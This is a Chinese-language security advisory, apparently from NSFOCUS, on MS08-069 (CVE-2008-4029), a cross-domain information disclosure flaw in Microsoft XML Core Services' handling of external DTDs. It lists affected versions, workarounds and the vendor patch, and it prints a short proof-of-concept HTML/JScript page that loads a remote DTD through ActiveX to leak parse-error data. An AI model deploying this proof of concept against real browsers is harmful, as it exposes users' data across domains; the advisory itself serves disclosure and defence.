安全研究

安全漏洞
Microsoft XML Core Services DTD跨域信息泄露漏洞(MS08-069)

发布日期:2008-11-11
更新日期:2008-11-12

受影响系统:
Microsoft XML Core Services 4.0
Microsoft XML Core Services 3.0
描述:
BUGTRAQ  ID: 32155
CVE(CAN) ID: CVE-2008-4029

Microsoft XML Core Services(MSXML)允许使用JScript、VBScript和Visual Studio 6.0的用户开发基于XML的应用,以与其他遵循XML 1.0标准的应用程序交互操作。

Microsoft XML Core Services处理外部文档类型定义(DTD)的错误检查的方式中存在一个信息泄露漏洞。如果用户浏览包含特制内容的网站或打开特制HTML电子邮件,此漏洞可能允许用户读取另一个Internet Explorer域中的网页的数据。

<*来源:Gregory Fleisher
  
  链接:http://secunia.com/advisories/23655
        http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA08-316A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<body>
KB955218 - CVE-2008-4029 - JA
<script type="text/javascript">
var dom = new ActiveXObject("Msxml2.DOMDocument.3.0");
dom.async = false;
var url = "http://www.milw0rm.com/forfun.dtd";
var xml = "<!DOCTYPE pwn SYSTEM '" + url + "'>";
if (dom.loadXML(xml) == 0)
{
    alert("Blue or Red Pill? " + dom.parseError.srcText);
}
</script>
</body>
</html>

建议:
临时解决方法:

* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件之前进行提示。
* 将Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS08-069)以及相应补丁:
MS08-069:Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (955218)
链接:http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx?pf=true

浏览次数:2992
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障